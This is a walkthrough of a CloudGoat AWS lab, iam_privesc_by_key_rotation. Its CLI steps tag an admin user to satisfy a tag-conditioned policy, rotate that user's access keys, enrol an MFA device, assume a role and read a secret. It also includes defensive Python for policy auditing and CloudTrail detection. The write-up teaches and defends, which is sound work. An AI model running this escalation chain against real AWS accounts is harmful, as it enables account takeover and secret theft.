CloudGoat: iam_privesc_by_key_rotation

5 min read · May 7, 2024

  • We will be performing our attack via Kali Linux
  • Ensure you have completed the prerequisites before you start the lab

1. Preparation

1.1 Launch the scenario:

└─# cd /opt/cloudgoat
└─# ./ create iam_privesc_by_key_rotation

# creates 3 IAM users in our AWS account: manager, developer, admin
# check them in the AWS management console under IAM

1.2 read the start.txt

└─# cd iam_privesc_by_key_rotation*

└─# cat start.txt

access key id = xxxaaa
access secret key = xxxbbb

2. Enumeration

2.1 create profile for manager user

└─# aws configure --profile manager

AWS Secret Access Key: 111122223333
Default region name:
Default output format:

2.2: whoami

└─# aws sts get-caller-identity --profile manager --region us-east-1

{
    "UserId": "...",
    "Account": "...",
    "Arn": "arn:aws:iam::1234:user/manager_iam_privesc_by_key_rotation_cgidsrm439imi5"
}

2.3: policies enumeration for “manager” user

└─# aws iam list-user-policies --user-name manager_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager

{
    "PolicyNames": [
        "SelfManageAccess",
        "TagResources"
    ]
}

└─# aws iam get-user-policy --user-name manager_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager --policy-name SelfManageAccess

{
    "UserName": "manager_iam_privesc_by_key_rotation_cgidsrm439imi5",
    "PolicyName": "SelfManageAccess",
    "PolicyDocument": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Action": [ ... ... ... ],
                "Condition": {
                    "StringEquals": {
                        "aws:ResourceTag/developer": "true"
                    }
                },
                "Effect": "Allow",
                "Resource": [ ... ... ... ],
                "Sid": "SelfManageAccess"
            },
            {
                "Action": [ ... ... ... ],
                "Effect": "Allow",
                "Resource": "arn:aws:iam::xxx:mfa/*",
                "Sid": "CreateMFA"
            }
        ]
    }
}

└─# aws iam get-user-policy --user-name manager_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager --policy-name TagResources

{
    "UserName": "manager_iam_privesc_by_key_rotation_cgidsrm439imi5",
    "PolicyName": "TagResources",
    "PolicyDocument": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Action": [ ... ... ... ],
                "Effect": "Allow",
                "Resource": "*",
                "Sid": "TagResources"
            }
        ]
    }
}

2.4: policies enumeration for “developer” user

  • get the developer’s user name from AWS management console’s IAM

└─# aws iam list-user-policies --user-name developer_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager

{
    "PolicyNames": [
        "DeveloperViewSecrets"
    ]
}

└─# aws iam get-user-policy --user-name developer_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager --policy-name DeveloperViewSecrets

{
    "UserName": "developer_iam_privesc_by_key_rotation_cgidsrm439imi5",
    "PolicyName": "DeveloperViewSecrets",
    "PolicyDocument": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Action": "secretsmanager:ListSecrets",
                "Effect": "Allow",
                "Resource": "*",
                "Sid": "ViewSecrets"
            }
        ]
    }
}

2.5: policies enumeration for “admin” user

  • get the admin’s user name from AWS management console’s IAM

└─# aws iam list-user-policies --user-name admin_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager

{
    "PolicyNames": [
        "AssumeRoles"
    ]
}

└─# aws iam get-user-policy --user-name admin_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager --policy-name AssumeRoles

{
    "UserName": "admin_iam_privesc_by_key_rotation_cgidsrm439imi5",
    "PolicyName": "AssumeRoles",
    "PolicyDocument": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Action": "sts:AssumeRole",
                "Effect": "Allow",
                "Resource": "arn:aws:iam::xxx:role/cg_secretsmanager_iam_privesc_by_key_rotation_cgidsrm439imi5",
                "Sid": "AssumeRole"
            }
        ]
    }
}

  • role name = cg_secretsmanager_iam_privesc_by_key_rotation_cgidsrm439imi5

2.6: policies enumeration for the role

└─# aws iam list-attached-role-policies --role-name cg_secretsmanager_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager

{
    "AttachedPolicies": [
        {
            "PolicyName": "cg_view_secrets_iam_privesc_by_key_rotation_cgidsrm439imi5",
            "PolicyArn": "arn:aws:iam::xxx:policy/cg_view_secrets_iam_privesc_by_key_rotation_cgidsrm439imi5"
        }
    ]
}

└─# aws iam get-policy --policy-arn arn:aws:iam::xxx:policy/cg_view_secrets_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager

{
    "Policy": {
        ... ... ...
        "DefaultVersionId": "v1",
        ... ... ...
    }
}

└─# aws iam get-policy-version --policy-arn arn:aws:iam::xxx:policy/cg_view_secrets_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager --version-id v1

{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": "secretsmanager:ListSecrets",
                    "Effect": "Allow",
                    "Resource": "*"
                },
                {
                    "Action": "secretsmanager:GetSecretValue",
                    "Effect": "Allow",
                    "Resource": "arn:aws:secretsmanager:us-east-1:xxx:secret:cg_secret_iam_privesc_by_key_rotation_cgidsrm439imi5-lRWCDA"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": true,
        "CreateDate": "2024-05-07T02:51:13+00:00"
    }
}
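What the enumeration above reveals is a policy pairing rather than one over-broad grant: SelfManageAccess only applies to users tagged developer=true, but TagResources lets the same manager user set tags on any resource, so the condition can be satisfied by the very principal it is meant to restrict. The Python script below is an added example (not part of the walkthrough and not CloudGoat's code) of the check a policy reviewer could run over a principal's inline policies to find that pairing. The policy documents in it are constructed to mirror the shape seen in 2.3 (the page elides the real action lists), the account id is a placeholder, and the function names (`find_self_unlockable_gates` and its helpers) are the example's own.

```python
import fnmatch

ACCOUNT = "123456789012"  # placeholder account id, not the lab's

# Constructed policies mirroring the shape seen in 2.3 (the real action lists
# are elided on the page): a grant gated on aws:ResourceTag/developer plus an
# unconditioned tagging grant held by the same principal.
MANAGER_POLICIES = {
    "SelfManageAccess": {
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "SelfManageAccess",
            "Effect": "Allow",
            "Action": ["iam:CreateAccessKey", "iam:DeleteAccessKey", "iam:ListAccessKeys"],
            "Resource": [f"arn:aws:iam::{ACCOUNT}:user/*"],
            "Condition": {"StringEquals": {"aws:ResourceTag/developer": "true"}},
        }],
    },
    "TagResources": {
        "Version": "2012-10-17",
        # A single statement object (no list) is valid IAM JSON; as_list() copes.
        "Statement": {"Sid": "TagResources", "Effect": "Allow",
                      "Action": ["iam:TagUser", "iam:UntagUser"], "Resource": "*"},
    },
}

# Constructed hardened variant: tagging is itself gated on developer=true, so
# the principal cannot place the tag that opens SelfManageAccess.
SAFER_POLICIES = {
    "SelfManageAccess": MANAGER_POLICIES["SelfManageAccess"],
    "TagResources": {
        "Version": "2012-10-17",
        "Statement": {"Sid": "TagResources", "Effect": "Allow",
                      "Action": ["iam:TagUser", "iam:UntagUser"], "Resource": "*",
                      "Condition": {"StringEquals": {"aws:ResourceTag/developer": "true"}}},
    },
}

# Actions that write the tags an aws:ResourceTag gate on IAM principals reads.
TAGGING_ACTIONS = ("iam:TagUser", "iam:TagRole")


def as_list(value):
    """IAM allows a bare string wherever a list is expected; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def statements(policies):
    """Yield (policy_name, statement) for every statement in every document."""
    for name, doc in policies.items():
        for stmt in as_list(doc.get("Statement")):
            yield name, stmt


def resource_tag_gates(stmt):
    """Return {tag_key: required_value} for aws:ResourceTag/* keys under StringEquals*."""
    gates = {}
    for operator, keys in stmt.get("Condition", {}).items():
        if operator.startswith("StringEquals"):  # also covers StringEqualsIgnoreCase
            for key, value in keys.items():
                if key.lower().startswith("aws:resourcetag/"):
                    gates[key.split("/", 1)[1]] = value
    return gates


def allows(stmt, action):
    """True if an Allow statement's Action patterns cover action (case-insensitive, wildcards)."""
    if stmt.get("Effect") != "Allow":
        return False
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in as_list(stmt.get("Action")))


def find_self_unlockable_gates(policies):
    """Pair each tag-gated Allow with an ungated tagging grant from the same principal."""
    # Assumed model limits: Deny/NotAction, resource ARN scoping, permissions
    # boundaries and SCPs are not evaluated, so treat the output as leads.
    findings = []
    for gate_policy, gated in statements(policies):
        gates = resource_tag_gates(gated)
        if gated.get("Effect") != "Allow" or not gates:
            continue
        for tag_policy, tagger in statements(policies):
            if tagger is gated or not any(allows(tagger, a) for a in TAGGING_ACTIONS):
                continue
            if set(resource_tag_gates(tagger)) & set(gates):
                continue  # tagging requires the gate tag itself, so it cannot bootstrap it
            findings.append({"gated_policy": gate_policy, "gated_sid": gated.get("Sid"),
                             "gated_actions": as_list(gated.get("Action")), "gate": gates,
                             "unlocked_by": f"{tag_policy}/{tagger.get('Sid')}"})
    return findings


if __name__ == "__main__":
    for f in find_self_unlockable_gates(MANAGER_POLICIES):
        print(f"{f['gated_policy']}/{f['gated_sid']} is gated on {f['gate']}, "
              f"but {f['unlocked_by']} lets the same principal set that tag")
    print("hardened variant findings:", find_self_unlockable_gates(SAFER_POLICIES))
```

The hardened variant shows one mitigation the model recognises: gate the tagging grant on the same tag. An explicit Deny on iam:TagUser for the gate key, or scoping the tagging grant's Resource away from privileged users, works as well, but this analyser deliberately does not evaluate Deny, NotAction, resource ARNs, permissions boundaries or SCPs, so treat its output as leads to confirm with a full evaluation such as the IAM policy simulator.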

3. Exploitation

3.01: tag the admin user with developer=true, so that the manager’s SelfManageAccess policy (conditioned on aws:ResourceTag/developer) lets us change the admin’s access keys

└─# aws iam tag-user --user-name admin_iam_privesc_by_key_rotation_cgidsrm439imi5 --tags '{"Key":"developer","Value":"true"}' --profile manager

3.02: List Access Keys

└─# aws iam list-access-keys --user-name admin_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager

{
    "AccessKeyMetadata": [
        {
            "UserName": "admin_iam_privesc_by_key_rotation_cgidsrm439imi5",
            "AccessKeyId": "xxxbbxxbb",
            "Status": "Inactive",
            "CreateDate": "2024-05-07T02:51:13+00:00"
        },
        {
            "UserName": "admin_iam_privesc_by_key_rotation_cgidsrm439imi5",
            "AccessKeyId": "xxxaaxxaa",
            "Status": "Inactive",
            "CreateDate": "2024-05-07T02:51:13+00:00"
        }
    ]
}

3.03: Delete an access key (the user already has two, which is the per-user limit, so one must go before a new one can be created)

└─# aws iam delete-access-key --user-name admin_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager --access-key-id xxxbbxxbb


3.04: Create Access Key

└─# aws iam create-access-key --user-name admin_iam_privesc_by_key_rotation_cgidsrm439imi5 --profile manager

{
    "AccessKey": {
        "UserName": "admin_iam_privesc_by_key_rotation_cgidsrm439imi5",
        "AccessKeyId": "newAccessKeyID123",
        "Status": "Active",
        "SecretAccessKey": "newSecretAccessKey123",
        "CreateDate": "2024-05-07T06:00:19+00:00"
    }
}


3.05: Create profile for the above credentials

└─# aws configure --profile admin

AWS Access Key ID: newAccessKeyID123
AWS Secret Access Key: newSecretAccessKey123
Default region name:
Default output format:

3.06: create a virtual mfa device -> QR Code

└─# ls


└─# aws iam create-virtual-mfa-device --virtual-mfa-device-name cloudgoat_virtual_mfa --outfile /opt/cloudgoat/QRCode.png --bootstrap-method QRCodePNG --profile manager
{
    "VirtualMFADevice": {
        "SerialNumber": "arn:aws:iam::xxx:mfa/cloudgoat_virtual_mfa"
    }
}

└─# ls

file.txt QRCode.png

3.07: set up the OTP with the QR Code and authenticator app

  • open the QRCode.png image
  • scan the QR code with your authenticator app (for example Google Authenticator or Microsoft Authenticator)
  • the authenticator app will now show an OTP for this device, which is refreshed periodically

3.08: enable the virtual mfa device

└─# aws iam enable-mfa-device \
--user-name admin_iam_privesc_by_key_rotation_cgidsrm439imi5 \
--serial-number arn:aws:iam::xxx:mfa/cloudgoat_virtual_mfa \
--authentication-code1 696202 \
--authentication-code2 204444 --profile manager
  • enable-mfa-device asks for two OTPs, passed above as authentication-code1 and authentication-code2
  • however, your authenticator app only shows one OTP at a time
  • use the current OTP as authentication-code1, wait for it to expire, and use the next OTP as authentication-code2
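Why the two-code step works as described, as an added example (not code from the walkthrough or from CloudGoat): the authenticator derives each OTP from the seed in the QR code and the current 30-second time window using RFC 6238 TOTP, and enable-mfa-device asks for the codes of two consecutive windows to confirm that seed and clock agree on both sides. The script below implements that derivation in Python with the RFC 6238 test seed (a constructed value, not a real device secret); `consecutive_codes` is the example's own helper name.

```python
import hashlib
import hmac
import struct
import time


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    value = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % 10 ** digits).zfill(digits)


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with the counter set to the current time window."""
    return hotp(secret, unix_time // step, digits)


def consecutive_codes(secret: bytes, unix_time: int, step: int = 30):
    """Codes for the current window and the next one, plus seconds until the next begins.

    This is the pair enable-mfa-device wants as authentication-code1/2: the app
    shows only the current code, so the second one appears after `wait` seconds.
    """
    window = unix_time // step
    wait = (window + 1) * step - unix_time
    return hotp(secret, window), hotp(secret, window + 1), wait


# Constructed input: the RFC 6238 SHA-1 test seed, not a real device secret.
RFC_SEED = b"12345678901234567890"

if __name__ == "__main__":
    first, second, wait = consecutive_codes(RFC_SEED, int(time.time()))
    print(f"authentication-code1={first}  authentication-code2={second} (usable in {wait}s)")
```

The same derivation is why MFA seeds must be protected like passwords: anyone holding the seed can compute every future code, which is the reason the QR code image is deleted in the clean-up step.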

3.09: assume a role

└─# aws sts assume-role --role-arn arn:aws:iam::xxx:role/cg_secretsmanager_iam_privesc_by_key_rotation_cgidsrm439imi5 --role-session-name cloudgoat_secret --serial-number arn:aws:iam::xxx:mfa/cloudgoat_virtual_mfa --token-code 490977 --profile admin

{
    ... ... ...
    "AccessKeyId": "newAccessKeyID888",
    "SecretKey": "newSecretAccessKey888",
    "SessionToken": "xxxxxxxxaaaa",
    ... ... ...
}

  • the token-code is another freshly generated OTP from your authenticator app

3.10: create a profile from the above credentials (aws configure does not prompt for a session token, so add aws_session_token to the credentials file by hand)

└─# aws configure --profile admin2

AWS Access Key ID: newAccessKeyID888
AWS Secret Access Key: newSecretAccessKey888
Default region name:
Default output format:
└─# mousepad /root/.aws/credentials
└─# cat /root/.aws/credentials

... ... ...
aws_access_key_id = newAccessKeyID888
aws_secret_access_key = newSecretAccessKey888
aws_session_token = xxxxxxxxaaaa

3.11: List the secrets in secretsmanager

└─# aws secretsmanager list-secrets --profile admin2 --region us-east-1

{
    "SecretList": [
        {
            "ARN": "arn:aws:secretsmanager:us-east-1:xxx:secret:cg_secret_iam_privesc_by_key_rotation_cgidsrm439imi5-lRWCDA",
            "Name": "cg_secret_iam_privesc_by_key_rotation_cgidsrm439imi5",
            "Description": "The primary secret for the iam_privesc_by_key_rotation scenario",
            "LastChangedDate": "2024-05-06T22:51:13.779000-04:00",
            "LastAccessedDate": "2024-05-06T20:00:00-04:00",
            "Tags": [
                {
                    "Key": "Scenario",
                    "Value": "iam_privesc_by_key_rotation"
                },
                {
                    "Key": "Stack",
                    "Value": "CloudGoat"
                }
            ],
            "SecretVersionsToStages": {
                "terraform-20240507025113290800000003": [ ... ... ... ]
            },
            "CreatedDate": "2024-05-06T22:51:11.359000-04:00"
        }
    ]
}

└─# aws secretsmanager get-secret-value --secret-id cg_secret_iam_privesc_by_key_rotation_cgidsrm439imi5 --region us-east-1 --profile admin2 | grep flag
"SecretString": "flag{14m_PERM15510N5_4Re_5C4R_76e05xxx}",
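From the defender's side, every step in section 3 lands in CloudTrail as an IAM management event, and the chain has a distinctive shape: one principal tags another user, then within minutes deletes and creates that user's access keys and enrols an MFA device for them. The Python below is an added detection example (not from the walkthrough or from CloudGoat) that runs two rules over a constructed, trimmed set of CloudTrail records carrying only the fields the rules read; the account id, ARNs and key id are placeholders, and `detect_key_takeover` is the example's own name.

```python
from datetime import datetime, timedelta

ACCOUNT = "123456789012"  # placeholder, not the lab account
MANAGER = f"arn:aws:iam::{ACCOUNT}:user/manager"
ADMIN = f"arn:aws:iam::{ACCOUNT}:user/admin"


def record(time, name, actor, **params):
    """Build a trimmed IAM CloudTrail record (constructed sample data)."""
    return {"eventTime": time, "eventSource": "iam.amazonaws.com", "eventName": name,
            "userIdentity": {"arn": actor}, "requestParameters": params}


# Constructed events following the order of 3.01, 3.03, 3.04 and 3.08, plus
# one benign self-service rotation that must not alert.
SAMPLE_EVENTS = [
    record("2024-05-07T05:58:02Z", "TagUser", MANAGER, userName="admin",
           tags=[{"key": "developer", "value": "true"}]),
    record("2024-05-07T05:59:10Z", "DeleteAccessKey", MANAGER, userName="admin",
           accessKeyId="AKIAPLACEHOLDER0001"),
    record("2024-05-07T06:00:19Z", "CreateAccessKey", MANAGER, userName="admin"),
    record("2024-05-07T06:04:40Z", "EnableMFADevice", MANAGER, userName="admin",
           serialNumber=f"arn:aws:iam::{ACCOUNT}:mfa/cloudgoat_virtual_mfa"),
    record("2024-05-07T06:10:00Z", "CreateAccessKey", ADMIN, userName="admin"),
]

KEY_ACTIONS = {"CreateAccessKey", "UpdateAccessKey", "DeleteAccessKey"}
AUTH_ACTIONS = {"EnableMFADevice", "DeactivateMFADevice", "CreateLoginProfile", "UpdateLoginProfile"}


def parse_time(stamp):
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")


def actor_name(event):
    """Last path segment of the caller ARN (user name or role session name)."""
    return event["userIdentity"]["arn"].rsplit("/", 1)[-1]


def detect_key_takeover(events, window=timedelta(hours=1)):
    """Alert on credential changes one principal makes to another user's identity.

    Severity is raised when the same actor tagged the target within `window`
    beforehand, the tell-tale of a tag-gated grant being self-unlocked.
    """
    alerts, last_tag = [], {}  # last_tag: (actor, target) -> (time, tags set)
    for event in sorted(events, key=lambda ev: parse_time(ev["eventTime"])):
        if event.get("eventSource") != "iam.amazonaws.com":
            continue
        params = event.get("requestParameters") or {}
        target, actor = params.get("userName"), actor_name(event)
        if not target or actor == target:  # self-service changes are normal
            continue
        when, name = parse_time(event["eventTime"]), event["eventName"]
        base = {"actor": actor, "target": target, "event": name, "time": event["eventTime"]}
        if name == "TagUser":
            last_tag[(actor, target)] = (when, [f"{t['key']}={t['value']}" for t in params.get("tags", [])])
        elif name in KEY_ACTIONS:
            tagged = last_tag.get((actor, target))
            if tagged and when - tagged[0] <= window:
                alerts.append({**base, "rule": "tag-then-rotate-key", "severity": "high", "tags": tagged[1]})
            else:
                alerts.append({**base, "rule": "cross-user-key-change", "severity": "medium"})
        elif name in AUTH_ACTIONS:
            alerts.append({**base, "rule": "cross-user-auth-change", "severity": "high"})
    return alerts


if __name__ == "__main__":
    for alert in detect_key_takeover(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['rule']}: {alert['actor']} -> {alert['target']} "
              f"({alert['event']} at {alert['time']})")
```

The benign final record, a user rotating their own key, produces no alert. A production pipeline should also suppress the account's known rotation automation and join on sourceIPAddress and userAgent, which the trimmed records omit; the high-severity rule fires regardless because a principal enrolling an MFA device for a different user is rarely legitimate outside a break-glass process.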


4. Clean up

└─# ./ destroy iam_privesc_by_key_rotation --help

Destroy xxx [y/n]: y

└─# rm QRCode.png




Written by 0xLeeBai

Before my bed the bright moonlight looks like frost on the ground; I raise my head to gaze at the bright moon, then lower it, thinking of home.